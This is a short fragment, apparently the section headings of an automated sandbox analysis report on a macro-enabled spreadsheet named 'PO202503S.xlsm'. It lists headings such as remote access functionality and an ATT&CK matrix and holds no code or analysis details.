Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
PO202503S.xlsm